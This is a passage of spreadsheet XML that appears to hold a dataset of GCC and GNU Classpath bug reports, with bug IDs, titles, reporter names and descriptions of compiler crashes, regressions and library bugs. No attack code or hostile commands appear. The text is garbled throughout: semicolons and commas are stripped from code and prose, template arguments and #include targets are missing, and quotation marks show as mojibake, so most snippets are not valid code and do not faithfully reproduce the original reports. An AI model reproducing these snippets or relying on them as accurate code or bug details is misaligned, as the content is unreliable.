samples  %        symbol name
34188    22.3480  bitmap_set_bit
18170    11.8774  free_deps
17475    11.4231  sched_analyze_insn
14018     9.1633  alloc_INSN_LIST
10173     6.6499  free_list
6100      3.9874  free_INSN_LIST_list
3946      2.5794  bitmap_bit_p
2442      1.5963  build_tree_conflict_graph
With just -O2 it finishes in 1:09 minute using 341m. With g++ 4.1 it finishes
in 1:21 using 148m even with -fno-enforce-eh-specs. g++-3.4 doesn't like this
test case.
This is on alphaev68-linux. The original report was on powerpc.</t>
  </si>
  <si>
    <t>GCC-49445</t>
  </si>
  <si>
    <t>[C++0x] Undefined reference to std::atomic operator float</t>
  </si>
  <si>
    <t>Hello
It looks like std::atomic does is not fully implemented. I get an undefined reference to its operator float:
libtool: link: g++ -Wall -I/usr/include -I../../src -I../../src -g -O2 -std=c++0x -DNDEBUG -o .libs/psynth_unit_test psynth_unit_test-psynth_unit_test.o [... a big list of object files ...] -L/usr/lib64 -lboost_unit_test_framework-mt -lboost_filesystem-mt -lboost_signals-mt -lboost_system-mt ../psynth/.libs/libpsynth.so -Wl-rpath -Wl/home/raskolnikov/usr/lib
../psynth/.libs/libpsynth.so: undefined reference to 
   `atomic::operator float() const'
A similar bug happened when I tried std::atomic with my_enum being a enum class my_enum : int I got an undefined reference to the store () method instead.
I am using GCC 4.6 as included in Debian Sid:
  g++ --version
  g++ (Debian 4.6.0-13) 4.6.1 20110611 (prerelease)
  apt-cache show libstdc++6-4.6-dev
  Package: libstdc++6-4.6-dev
  Source: gcc-4.6
  Version: 4.6.0-13
Anyways thanks a lot for your hard work implementing C++11 :)
JP</t>
  </si>
  <si>
    <t>raskolnikov</t>
  </si>
  <si>
    <t>GCC-19395</t>
  </si>
  <si>
    <t>[3.4 regression] invalid scope qualifier allowed in typedef</t>
  </si>
  <si>
    <t>The following invalid code snippet is accepted since gcc 3.0
(without warning even with -pedantic -Wall -W):
=======================
struct A
{
    typedef int ::X
}
=======================</t>
  </si>
  <si>
    <t>GCC-1228</t>
  </si>
  <si>
    <t>RE: gcj/189: can not build libgcj (internal error - SP mismatch) -- PR#155 not fixed</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: This is a bogus PR.
</t>
  </si>
  <si>
    <t>hargettp</t>
  </si>
  <si>
    <t>GCC-26445</t>
  </si>
  <si>
    <t>SSE byte-by-byte load instruction fails to compile</t>
  </si>
  <si>
    <t>Call to the following function ...
/*inline */ void ConvertFloatSSE(void *inBuff void *outBuff int len)
{
   unsigned char* inByteBuffer   = reinterpret_cast(inBuff)
   float*         outFloatBuffer = reinterpret_cast(outBuff)
   for(int i = 0 i&lt;len/4 i++)
   {
      __m128i register1 = _mm_set_epi8(
                                       *inByteBuffer     *(inByteBuffer+ 1) *(inByteBuffer+ 2) 0
                                       *(inByteBuffer+3) *(inByteBuffer+ 4) *(inByteBuffer+ 5) 0
                                       *(inByteBuffer+6) *(inByteBuffer+ 7) *(inByteBuffer+ 8) 0
                                       *(inByteBuffer+9) *(inByteBuffer+10) *(inByteBuffer+11) 0
                                      )
      __m128i register2 = _mm_srai_epi32  (register1 8)
      __m128  register3 = _mm_cvtepi32_ps (register2)
                      _mm_store_ps    (outFloatBuffer register3)
      outFloatBuffer += 4
      inByteBuffer += 12
   }
}
generates...
************************************************************************************************************************************
if g++ -DHAVE_CONFIG_H -I. -I/home/gchernis/tryswap/src -I.. -O1 -g0 -Wall -march=opteron -MT tryswap.o -MD -MP -MF .deps/tryswap.Tpo -c -o tryswap.o /home/gchernis/tryswap/src/tryswap.cpp then mv -f .deps/tryswap.Tpo .deps/tryswap.Po else rm -f .deps/tryswap.Tpo exit 1 fi
/home/gchernis/tryswap/src/tryswap.cpp: In function â€˜void ConvertFloatSSE(void* void* int)â€™:
/home/gchernis/tryswap/src/tryswap.cpp:189: error: unable to find a register to spill in class â€˜GENERAL_REGSâ€™
/home/gchernis/tryswap/src/tryswap.cpp:189: error: this is the insn:
(insn 90 89 91 2 (parallel [
(set (subreg:DI (reg:V16QI 21 xmm0 [102]) 0)
(ashift:DI (reg:DI 1 dx [90])
(const_int 8 [0x8])))
(clobber (reg:CC 17 flags))
]) 394 {*ashldi3_1_rex64} (insn_list:REG_DEP_TRUE 66 (nil))
(expr_list:REG_UNUSED (reg:CC 17 flags)
(expr_list:REG_UNUSED (reg:CC 17 flags)
(expr_list:REG_DEAD (reg:DI 1 dx [90])
(nil)))))
/home/gchernis/tryswap/src/tryswap.cpp:189: confused by earlier errors bailing out
gmake[2]: *** [tryswap.o] Error 1
gmake[1]: *** [all-recursive] Error 1
gmake: *** [all] Error 2
*** Exited with status: 2 ***</t>
  </si>
  <si>
    <t>gchernis11</t>
  </si>
  <si>
    <t>GCC-22087</t>
  </si>
  <si>
    <t>ctype tables are offset by one on DJGPP</t>
  </si>
  <si>
    <t>On DJGPP rather than _M_table pointing to the mask for '\0' it points to the
mask for EOF.  It is then offset by one in ctype::is(mask char) but not
in ctype::is(const char* const char* mask*) ctype::table() or in
the constructor mask* parameter.  (ctype::classic_table() returns 0.)
The constructor also sets _M_toupper and _M_tolower to point to the respective
table entries for EOF but then doesn't use them at all instead passing the
char parameter to ::toupper(int) or ::tolower(int) without casting it to
unsigned char.
ctype_inline.h and ctype_noninline.h in config/os/djgpp/ should probably be
updated to match the Solaris files for example with __ctype_mask changed to
(__dj_ctype_flags+1) __trans_upper changed to (__dj_ctype_toupper+1) and
__trans_lower changed to (__dj_ctype_tolower+1).
(This bug is similar to the old bug 7461 against Cygwin.)</t>
  </si>
  <si>
    <t>carey.evans</t>
  </si>
  <si>
    <t>CLASSPATH-22769</t>
  </si>
  <si>
    <t>Null pointer dereference in gnu/java/security/x509/X509Certificate.java</t>
  </si>
  <si>
    <t xml:space="preserve">Lines 550-554 of X509Certificate.java:
        if (val == null)
          algVal = null
        else
          algVal = val.getEncoded()
        if (val.isConstructed()) 
          ...
If val is null as checked by the test at line 550 a null pointer exception
will occur at line 554.
This bug was found with our static analysis tool for finding bugs in Java programs FindBugs:
   http://findbugs.sourceforge.net/
</t>
  </si>
  <si>
    <t>GCC-59583</t>
  </si>
  <si>
    <t>--enable-targets=all --with-cpu=broadwell isn't allowed to configure i686-linux</t>
  </si>
  <si>
    <t>I got
# /export/gnu/import/git/gcc/configure --enable-clocale=gnu --with-system-zlib --with-demangler-in-ld  --enable-shared i686-linux --prefix=/usr/gcc-4.9.0 --with-local-prefix=/usr/local --enable-targets=all --with-cpu=broadwell --with-fpmath=sse
...
# make bootstrap
...
Unsupported CPU used in --with-cpu=broadwell supported values:
generic intel atom slm core2 corei7 corei7-avx nocona x86-64 bdver4 bdver3 bdver2 bdver1 btver2 btver1 amdfam10 barcelona k8 opteron athlon64 athlon-fx athlon64-sse3 k8-sse3 opteron-sse3
make[3]: *** [configure-stage1-gcc] Error 1
make[3]: Leaving directory `/export/build/gnu/gcc-test-32bit/build-i686-linux'
make[2]: *** [stage1-bubble] Error 2
make[2]: Leaving directory `/export/build/gnu/gcc-test-32bit/build-i686-linux'
make[1]: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-70563</t>
  </si>
  <si>
    <t>SFINAE fails when trying invalid template instantiation</t>
  </si>
  <si>
    <t>vogt@fermi03:~/temp2&gt; cat test_SFINAE_with_template_binding.ii 
# 1 test_SFINAE_with_template_binding.cc
# 1 
# 1 
# 1 /usr/include/stdc-predef.h 1 3 4
# 1  2
# 1 test_SFINAE_with_template_binding.cc
template using void_t = void
template struct TemporaryBindObject
{
}
struct MyTrueType
{
 static constexpr bool value = true
}
struct MyFalseType
{
 static constexpr bool value = false
}
template class Dest&gt; struct TestValidBind
{
 template&gt; struct toTypesOf : MyFalseType
 {}
 template class Src typename... Ts&gt; struct toTypesOf void_t&gt;&gt; : MyTrueType
 {}
}
template struct OneParamStruct
{
}
template struct TwoParamStruct
{
}
using tmp = TemporaryBindObject
int main()
{
 bool value1 = TestValidBind::toTypesOf&gt;::value
 bool value2 = TestValidBind::toTypesOf&gt;::value
}
vogt@fermi03:~/temp2&gt; g++-5 -std=c++11 test_SFINAE_with_template_binding.ii
test_SFINAE_with_template_binding.cc: In function â€˜int main()â€™:
test_SFINAE_with_template_binding.cc:41:16: error: incomplete type â€˜TestValidBind::toTypesOf &gt;â€™ used in nested name specifier
  bool value2 = TestValidBind::toTypesOf&gt;::value
                ^
vogt@fermi03:~/temp2&gt; g++-5 --version
g++-5 (SUSE Linux) 5.3.1 20160301 [gcc-5-branch revision 233849]
Copyright (C) 2015 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
The example works with clang. I am not a standard expert to decide who is right. Actually a simplified version works with gcc however I don't see the reason why this shouldn't see http://stackoverflow.com/a/36411945/5085250
Same problem with
vogt@fermi03:~/temp2&gt; g++-6 --version
g++-6 (SUSE Linux) 6.0.0 20160324 (experimental) [trunk revision 234449]
Copyright (C) 2016 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>GCC-50841</t>
  </si>
  <si>
    <t>[4.7 regression] bootstrap failure: narrowing conversion of '-0x00000000000000001' from 'int' in tree-object-size.c</t>
  </si>
  <si>
    <t>/scratch/tmp/gerald/gcc-HEAD/gcc/tree-object-size.c:44:59: error: narrowing conv
ersion of '-0x00000000000000001' from 'int' to 'long unsigned int' inside { } [-
Werror=narrowing]
/scratch/tmp/gerald/gcc-HEAD/gcc/tree-object-size.c:44:59: error: narrowing conv
ersion of '-0x00000000000000001' from 'int' to 'long unsigned int' inside { } [-
Werror=narrowing]
cc1plus: all warnings being treated as errors
gmake[3]: Leaving directory `/local0/scratch/gerald/OBJ-1023-1848/gcc'
gmake[2]: *** [all-stage2-gcc] Error 2
gmake[2]: Leaving directory `/local0/scratch/gerald/OBJ-1023-1848'
gmake[1]: *** [stage2-bubble] Error 2
I have a hunch this may be triggered though not necessarily originally
caused by
        2011-10-23  Paolo Carlini  
        PR c++/50810
        * c-opts.c (c_common_handle_option): Enable -Wnarrowing as part
        of -Wall include -Wnarrowing in -Wc++0x-compat adjust default
        Wnarrowing for C++0x and C++98.
        * c.opt ([Wnarrowing]): Update.</t>
  </si>
  <si>
    <t>GCC-32295</t>
  </si>
  <si>
    <t>[4.1 Regression] An invalid c code causes an ICE in create_tmp_var at gimplify.c:489</t>
  </si>
  <si>
    <t>The following invalid code snippet fails with
  foo.c:4: internal compiler error: in create_tmp_var at gimplify.c:489
static enum warn overflow
int foo (int code tree stmt)
{
  if (code == 0 || code &gt; (int) overflow)
    code = overflow
  return code
}</t>
  </si>
  <si>
    <t>GCC-38977</t>
  </si>
  <si>
    <t>[4.4 Regression] bash no longer builds with profile-feedback</t>
  </si>
  <si>
    <t>I see
jobs.c: In function 'make_child':
jobs.c:4121: error: corrupted profile info: profile data is not flow-consistent
jobs.c:4121: error: corrupted profile info: number of executions for edge 10-11 thought to be -1726
jobs.c:4121: error: corrupted profile info: number of executions for edge 10-12 thought to be 1745
jobs.c:4121: error: corrupted profile info: number of iterations for basic block 11 thought to be -120
this error did not exist in GCC 4.3.  In 4.4 -fprofile-correction was
introduced (not enabled by default) guarded with a new check in profile.c:
  /* Check for inconsistent basic block counts */
  inconsistent = is_inconsistent ()
  if (inconsistent)
   {
     if (flag_profile_correction)
       {
...
       }
     else
       error (corrupted profile info: profile data is not flow-consistent)
   }
so we now unconditionally throw an error on something we ignored before.
IMHO we should either enable flag_profile_correction by default or
remove this error again.</t>
  </si>
  <si>
    <t>GCC-5232</t>
  </si>
  <si>
    <t>[IA-64] ICE when compiling XEmacs with gcc-3.0.3</t>
  </si>
  <si>
    <t>I get the following ICE when trying to compile xemacs on Linux/IA64. 
toutatis&gt; gcc -v -save-temps -c -O2  -Demacs -I. -DHAVE_CONFIG_H -I/usr/X11R6/include device-x.c
Reading specs from /usr/local/lib/gcc-lib/ia64-redhat-linux/3.0.3/specs
Configured with: ../configure --host=ia64-redhat-linux --enable-threads
Thread model: posix
gcc version 3.0.3
 /usr/local/lib/gcc-lib/ia64-redhat-linux/3.0.3/cpp0 -lang-c -v -I. -I/usr/X11R6/include -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=3 -D__ia64 -D__ia64__ -D__linux -D__linux__ -D_LONGLONG -Dlinux -Dunix -D__LP64__ -D__ELF__ -D__ia64 -D__ia64__ -D__linux -D__linux__ -D_LONGLONG -D__linux__ -D__unix__ -D__LP64__ -D__ELF__ -D__linux -D__unix -Asystem=linux -Acpu=ia64 -Amachine=ia64 -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D__LONG_MAX__=9223372036854775807L -Demacs -DHAVE_CONFIG_H device-x.c device-x.i
GNU CPP version 3.0.3 (cpplib) (IA-64) Linux
ignoring nonexistent directory /usr/local/ia64-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 .
 /usr/X11R6/include
 /usr/local/include
 /usr/local/lib/gcc-lib/ia64-redhat-linux/3.0.3/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/ia64-redhat-linux/3.0.3/cc1 -fpreprocessed device-x.i -quiet -dumpbase device-x.c -O2 -version -o device-x.s
GNU CPP version 3.0.3 (cpplib) (IA-64) Linux
GNU C version 3.0.3 (ia64-redhat-linux)
        compiled by GNU C version 3.0.3.
device-x.c: In function `x_init_device':
device-x.c:818: Internal compiler error in ia64_sched_reorder2 at config/ia64/ia64.c:5948
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.0.3
Environment:
toutatis&gt; uname -a
Linux toutatis 2.4.16 #1 SMP Thu Dec 6 21:57:22 CST 2001 ia64 unknown
toutatis&gt; gcc -v
Reading specs from /usr/local/lib/gcc-lib/ia64-redhat-linux/3.0.3/specs
Configured with: ../configure --host=ia64-redhat-linux --enable-threads
Thread model: posix
gcc version 3.0.3
How-To-Repeat:
Compile the attached preprocessed source.</t>
  </si>
  <si>
    <t>kitty</t>
  </si>
  <si>
    <t>CLASSPATH-26956</t>
  </si>
  <si>
    <t>loads differently in standalone plugin than browser</t>
  </si>
  <si>
    <t>http://www.jamesh.id.au/fractals/ifs/spiral.html &lt;-- wrong/bad pic in browser
http://time.gov/timezone.cgi?Mountain/d/-7/java &lt;-- loads in standalone not browser</t>
  </si>
  <si>
    <t>GCC-68949</t>
  </si>
  <si>
    <t>[5/6 Regression] Implicit initialization of array member silently miscompiling.</t>
  </si>
  <si>
    <t>Created attachment 37056
ii
Hello i believe that i have found a bug in gcc. This is my first time submitting a bug to this project so if i'm missing something important please let me know so i can provide it. I've tried to follow the guidelines best i could.
More specifically i think there is a bug in the way it handles the implicit default initialization of an array member when that member has a constexpr constructor and a non-inline move constructor that delegates.
I can imagine that doesn't really paint a clear picture so ill just let the code do the talking instead:
// % $CXX -std=c++11 -Wall -Wextra -o zero zero.cc  echo $?
//
// expected return
// return of g++ 4.9.2
// return of clang++ 3.7.0
// 0
//
// return of g++ 5.2.0
// return of g++ 5.3.0
// 1
struct Sub {
    int i
    constexpr Sub() : i(-1) {} // remove constexpr and it works as expected
    Sub(Sub // remove this constructor and it works as epxected.
}
// v-- move this inline and it works as expected
// v-- remove ': Sub()' and it works as expected
Sub::Sub(Sub i = rhs.i rhs.i = tmp }
struct Class {
    // v-- remove '[1]' and it works as expected
    // v-- add '= {}' and it works as expected
    Sub s[1]
    // v-- add ': s{}' and it works as expected
    // v-- removing this constructor makes it work as expected
    Class() {}
}
int main() {
    Class c
    return c.s[0].i != -1
}
Instead of the expected '-1' 'i' is actually '0' on 5.2 and 5.3 causing it to return 1 on those.
Ive attached the .ii that this file produced. And for completion here is the -v output of the gcc's i had at my disposal (the gcc-5.2 behavior was given by someone else):
% x86_64-pc-linux-gnu-gcc-5.1 -v
Using built-in specs.
COLLECT_GCC=x86_64-pc-linux-gnu-gcc-5.1
COLLECT_LTO_WRAPPER=/usr/x86_64-pc-linux-gnu/libexec/gcc/x86_64-pc-linux-gnu/5.3.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/paludis/build/sys-devel-gcc-5.3.0/work/gcc-5.3.0/configure --cache-file=config.cache --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --prefix=/usr/x86_64-pc-linux-gnu --datarootdir=/usr/share --localstatedir=/var --sysconfdir=/etc --disable-dependency-tracking --enable-fast-install --enable-serial-configure --disable-bootstrap --disable-decimal-float --disable-install-libiberty --disable-libada --disable-libatomic --disable-libcilkrts --disable-libffi --disable-libgfortran --disable-libgo --disable-libgomp --disable-libitm --disable-libjava --disable-libmpx --disable-libobjc --disable-liboffloadmic --disable-libquadmath --disable-libsanitizer --disable-libssp --disable-libstdcxx --disable-libstdc++-v3 --disable-libvtv --disable-vtable-verify --disable-multilib --disable-nls --disable-shared --enable-lto --disable-plugin --enable-threads --enable-languages=cc++fortranobjcobj-c++ --with-sysroot= --with-gxx-include-dir=/usr/x86_64-pc-linux-gnu/include/c++/5.3.0 --with-isl --program-transform='s$-5.1' --with-lib-path=/usr/x86_64-pc-linux-gnu/lib --with-as=/usr/x86_64-pc-linux-gnu/bin/x86_64-pc-linux-gnu-as --with-ld=/usr/x86_64-pc-linux-gnu/bin/x86_64-pc-linux-gnu-ld --with-system-zlib --with-glibc-version=2.11 --enable-linker-build-id --with-multilib-list=
Thread model: posix
gcc version 5.3.0 (GCC)
% x86_64-pc-linux-gnu-gcc-4.9 -v
Using built-in specs.
COLLECT_GCC=x86_64-pc-linux-gnu-gcc-4.9
COLLECT_LTO_WRAPPER=/usr/x86_64-pc-linux-gnu/libexec/gcc/x86_64-pc-linux-gnu/4.9.2/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/paludis/build/sys-devel-gcc-4.9.2-r11/work/gcc-4.9.2/configure --cache-file=config.cache --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --prefix=/usr/x86_64-pc-linux-gnu --datarootdir=/usr/share --localstatedir=/var --sysconfdir=/etc --disable-dependency-tracking --enable-fast-install --enable-serial-configure --disable-bootstrap --disable-decimal-float --disable-install-libiberty --disable-libada --disable-libatomic --disable-libcilkrts --disable-libffi --disable-libgfortran --disable-libgo --disable-libgomp --disable-libitm --disable-libjava --disable-libobjc --disable-libquadmath --disable-libsanitizer --disable-libssp --disable-libstdcxx --disable-libstdc++-v3 --disable-libvtv --disable-vtable-verify --disable-multilib --disable-nls --disable-shared --enable-lto --disable-plugin --enable-threads --enable-languages=cc++fortranobjcobj-c++ --with-sysroot= --with-gxx-include-dir=/usr/x86_64-pc-linux-gnu/include/c++/4.9.2 --without-cloog --program-transform='s$-4.9' --with-lib-path=/usr/x86_64-pc-linux-gnu/lib --with-as=/usr/x86_64-pc-linux-gnu/bin/x86_64-pc-linux-gnu-as --with-ld=/usr/x86_64-pc-linux-gnu/bin/x86_64-pc-linux-gnu-ld --with-system-zlib --with-glibc-version=2.11 --enable-linker-build-id --with-multilib-list=
Thread model: posix
gcc version 4.9.2 (GCC)</t>
  </si>
  <si>
    <t>woutershep</t>
  </si>
  <si>
    <t>GCC-12777</t>
  </si>
  <si>
    <t>Bootstrap fails: conflicting types in dwarf2out.c and tree.h etc.</t>
  </si>
  <si>
    <t>GCC-6601</t>
  </si>
  <si>
    <t>Parse error when using :: qualified name in template.</t>
  </si>
  <si>
    <t xml:space="preserve">	When instantiating a template class with a another class qualified
with :: the compiler reports a parse error. This is true both for standard
templates like vector or user defined templates.
Release:
3.0.2
Environment:
Linux RedHat 7.1 with local changes
System: Linux wensley-clued0 2.4.14-0.1XFSsmp #1 SMP Mon Nov 12 09:22:08 CST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/scratch/1/veseli/gcc --with-gnu-as --with-gnu-ld --enable-shared --enable-threads --enable-languages=cc++
How-To-Repeat:
	template
	class MyTemplate
	{
	}
	class X {}
	MyTemplate test</t>
  </si>
  <si>
    <t>rhauser</t>
  </si>
  <si>
    <t>GCC-6312</t>
  </si>
  <si>
    <t>libiberty and vasprintf() sigsegv's on some platforms</t>
  </si>
  <si>
    <t>The exact bug is in vasprintf() in libiberty/vasprintf.c.
Consider the following example. All looks good but on the PPC (ppc-qnx6) it won't print out 2. See below for an explanation.
==================
#include 
#include 
void
handle_foo(char *fmt va_list *pva) {
    printf(%d\n va_arg(*pva int))
}
void
vfoo(char *fmt va_list va) {
    handle_foo(fmt 
}
void
foo(char *fmt ...) {
    va_list va
    va_start(va fmt)
    vfoo(fmt va)
    va_end(va)
}
int
main() {
    foo( 2)
    return 0
}
===============
The problem is that sometimes the va_list type is an array (as on the PPC) and sometimes not (X86 etc). The C standard says that prototypes such as vfoo() have the array type silently coerced to be a pointer to a base type. This makes things work when you pass an array object to the function. An array-typed expression
is converted to a pointer to the first element when used in an rvalued context the coercion in the function makes everybody happy. The problem comes when you then pass the address of the va_list parameter to another function. It's expecting a pointer to the array but what it _really_ gets is a pointer to a pointer (because of the original conversion).
Any use of the va_list in the second function won't get the right data.
Here's the example modified so that it works in all cases:
=======================
#include 
#include 
void
handle_foo(char *fmt va_list *pva) {
    printf(%d\n va_arg(*pva int))
}
void
vfoo(char *fmt va_list va) {
    va_list temp
    va_copy(temp va)
    handle_foo(fmt 
}
void
foo(char *fmt ...) {
    va_list va
    va_start(va fmt)
    vfoo(fmt va)
    va_end(va)
}
int
main() {
    foo( 2)
    return 0
}
=============
The use of the va_copy() 'undoes' the coercion that happens in the parameter list so that the handle_foo() function now gets the proper data.
Release:
unknown
Environment:
I observed this with the head branch of gdb hosted on i386-qnx6 targetting ppc-qnx6 but it is a generic issue in libiberty.
How-To-Repeat:
See libiberty/vasprintf.c vasprintf().</t>
  </si>
  <si>
    <t>gp</t>
  </si>
  <si>
    <t>GCC-16395</t>
  </si>
  <si>
    <t>Problem with operator&amp; and templates</t>
  </si>
  <si>
    <t>Under certain conditions (non-fully defined template it seems) operator&amp;
overload is not used.
output of gcc -v:
Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.4/specs
Configured with: ../src/configure -v
--enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-clocale=gnu --enable-debug --enable-java-gc=boehm
--enable-java-awt=xlib --enable-objc-gc i486-linux
Thread model: posix
gcc version 3.3.4 (Debian 1:3.3.4-2)
Sample program:
template class A
{
public:
    A()
    void foo()const{}
    const A }
}
template const A }
void test()
{
    A a
    (
}
int main(int argc char**argv){}
template  A::A(){}
Compiler output:
gccbug.cc: In function `void test()':
gccbug.cc:37: error: request for member `foo' in `+test_amp [with T = int]()' 
   which is of non-aggregate type `const A*'
If the constructor for A is placed before test or if the A a
declaration is removed or if int is replaced with void in test_amp the
problem disappears.</t>
  </si>
  <si>
    <t>chgros+bugzilla</t>
  </si>
  <si>
    <t>GCC-61914</t>
  </si>
  <si>
    <t>[4.10 Regression] wide-int change breaks bootstrap</t>
  </si>
  <si>
    <t>r210113 breaks x32 bootstrap when GCC is compiled as x32 binary with
# CC=gcc -mx32 CXX=g++ -mx32 .../gcc/configure
I got
[hjl@gnu-mic-2 build-x86_64-linux]$ grep xfff gcc/gtype.state
   (!pair  A\xfffffff1
    (!type undefined 1484 nil  gc_unused A\xfffffff1
   (!pair  A\xfffffff1
 (!pair  A\xfffffff1
[hjl@gnu-mic-2 build-x86_64-linux]$</t>
  </si>
  <si>
    <t>GCC-80840</t>
  </si>
  <si>
    <t>[7/8 Regression] ICE in convert_nontype_argument reference to double</t>
  </si>
  <si>
    <t>The following code causes an internal compiler error:
#include 
template 
struct Just
template 
struct Number {
    static constexpr double value = X
    using result = Just&lt;const double
}
int main() {}
prog.cc:9:45: internal compiler error: in convert_nontype_argument at cp/pt.c:6828
     using result = Just&lt;const double
                                             ^
0x5e59bd convert_nontype_argument
	../../gcc-7.1.0/gcc/cp/pt.c:6827
0x5e59bd convert_template_argument
	../../gcc-7.1.0/gcc/cp/pt.c:7668
0x5e669c coerce_template_parms
	../../gcc-7.1.0/gcc/cp/pt.c:8128
0x5e8a09 lookup_template_class_1
	../../gcc-7.1.0/gcc/cp/pt.c:8664
0x5e8a09 lookup_template_class(tree_node* tree_node* tree_node* tree_node* int int)
	../../gcc-7.1.0/gcc/cp/pt.c:9009
0x6827dd finish_template_type(tree_node* tree_node* int)
	../../gcc-7.1.0/gcc/cp/semantics.c:3151
0x631ff4 cp_parser_template_id
	../../gcc-7.1.0/gcc/cp/parser.c:15495
0x63214f cp_parser_class_name
	../../gcc-7.1.0/gcc/cp/parser.c:21953
0x63c737 cp_parser_qualifying_entity
	../../gcc-7.1.0/gcc/cp/parser.c:6286
0x63c737 cp_parser_nested_name_specifier_opt
	../../gcc-7.1.0/gcc/cp/parser.c:5972
0x63f452 cp_parser_simple_type_specifier
	../../gcc-7.1.0/gcc/cp/parser.c:16826
0x62828d cp_parser_type_specifier
	../../gcc-7.1.0/gcc/cp/parser.c:16499
0x63e6c2 cp_parser_type_specifier_seq
	../../gcc-7.1.0/gcc/cp/parser.c:20781
0x6355f1 cp_parser_type_id_1
	../../gcc-7.1.0/gcc/cp/parser.c:20627
0x63bb28 cp_parser_type_id
	../../gcc-7.1.0/gcc/cp/parser.c:20697
0x63bb28 cp_parser_alias_declaration
	../../gcc-7.1.0/gcc/cp/parser.c:18593
0x625d3c cp_parser_member_declaration
	../../gcc-7.1.0/gcc/cp/parser.c:23041
0x62696a cp_parser_member_specification_opt
	../../gcc-7.1.0/gcc/cp/parser.c:22945
0x62696a cp_parser_class_specifier_1
	../../gcc-7.1.0/gcc/cp/parser.c:22098
0x6285c1 cp_parser_class_specifier
	../../gcc-7.1.0/gcc/cp/parser.c:22350
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>cipherjason</t>
  </si>
  <si>
    <t>GCC-30763</t>
  </si>
  <si>
    <t>[4.1 Regression] problem with bit-fields assignment</t>
  </si>
  <si>
    <t>Test case:
#include 
#define INT_INVALID -1
class Test
{
  int b : 16
  int a
  int c : 16
public:
  Test()
  {
        b = a = c = INT_INVALID
        //a = b = c = INT_INVALID
  }
  void dump()const
  {
        printf(a: %d\tb: %d\tc: %d\nabc)
  }
}
int main()
{
    Test a
    a.dump()
    return 0
}
----------------------------
g++-4.1 main.cpp
./a.out
a: 65535        b: -1   c: -1
g++-4.0 main.cpp
a: -1   b: -1   c: -1
It seems like regression in GCC-4.1.1 and 4.1.2(on GCC-4.1.0 and earlier 
I've got correct results)</t>
  </si>
  <si>
    <t>vovanec</t>
  </si>
  <si>
    <t>GCC-9474</t>
  </si>
  <si>
    <t xml:space="preserve">[3.2 regression] GCC freezes in compiling a weird code mixing  and </t>
  </si>
  <si>
    <t>When I try to compile the following C++ source code cc1plus never finishes and runs forever.
------------------ temp.cc
#include 
typedef std::istream istream
#include 
------------------ temp.cc (end)
Of course the source is weird but gcc should report some error and exit. 
I ran into this problem when managing a C++ code
using flex 2.5.4a.
The  attached to the latest flex source code still uses  but I want to switch ...
Release:
gcc version 3.2.2 20030109 (Debian prerelease)
Environment:
Debian GNU/Linux with kernel 2.4.20
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-linux/3.2.2/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf77protopascalobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-java-gc=boehm --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.2.2 20030109 (Debian prerelease)
How-To-Repeat:
$ cat temp.cc
#include 
typedef std::istream istream
#include 
$ g++ temp.cc
In file included from /usr/include/c++/3.2/backward/iostream.h:31
                 from temp.cc:3:
/usr/include/c++/3.2/backward/backward_warning.h:32:2: warning: #warning This file includes at least one deprecated or antiquated header. Please consider using one of the 32 headers found in section 17.4.1.2 of the C++ standard. Examples include substituting the  header for the  header for C++ includes or  instead of the deprecated header . To disable this warning use -Wno-deprecated.
... compiles forever ...</t>
  </si>
  <si>
    <t>t-gcc</t>
  </si>
  <si>
    <t>CLASSPATH-31646</t>
  </si>
  <si>
    <t>Arrays.sort() broken</t>
  </si>
  <si>
    <t>Arrays.sort() is broken as this code demonstrates:
class sort
{
  public static void main(String[] args)
  {
    int[] arr = new int[20]
    arr[0] = 0
    arr[1] = 1
    arr[2] = 2
    arr[3] = 3
    arr[4] = 4
    arr[5] = 5
    arr[6] = 6
    arr[7] = 7
    arr[8] = 8
    arr[9] = 9
    arr[10] = 9
    arr[11] = 8
    arr[12] = 7
    arr[13] = 6
    arr[14] = 5
    arr[15] = 4
    arr[16] = 3
    arr[17] = 2
    arr[18] = 1
    arr[19] = 0
    java.util.Arrays.sort(arr 10 20)
    for (int i = 10 i &lt; 20 i++) System.out.print(arr[i] +  )
  }
}
Output:
0 1 2 3 4 5 5 6 7 8</t>
  </si>
  <si>
    <t>GCC-9448</t>
  </si>
  <si>
    <t>[mainline] Wrong code with -O2 -fprefetch-loop-arrays</t>
  </si>
  <si>
    <t>In loop.c in function emit_prefetch_instructions on line 4200
there is the following command:
init_val = convert_to_mode (Pmode init_val 0)
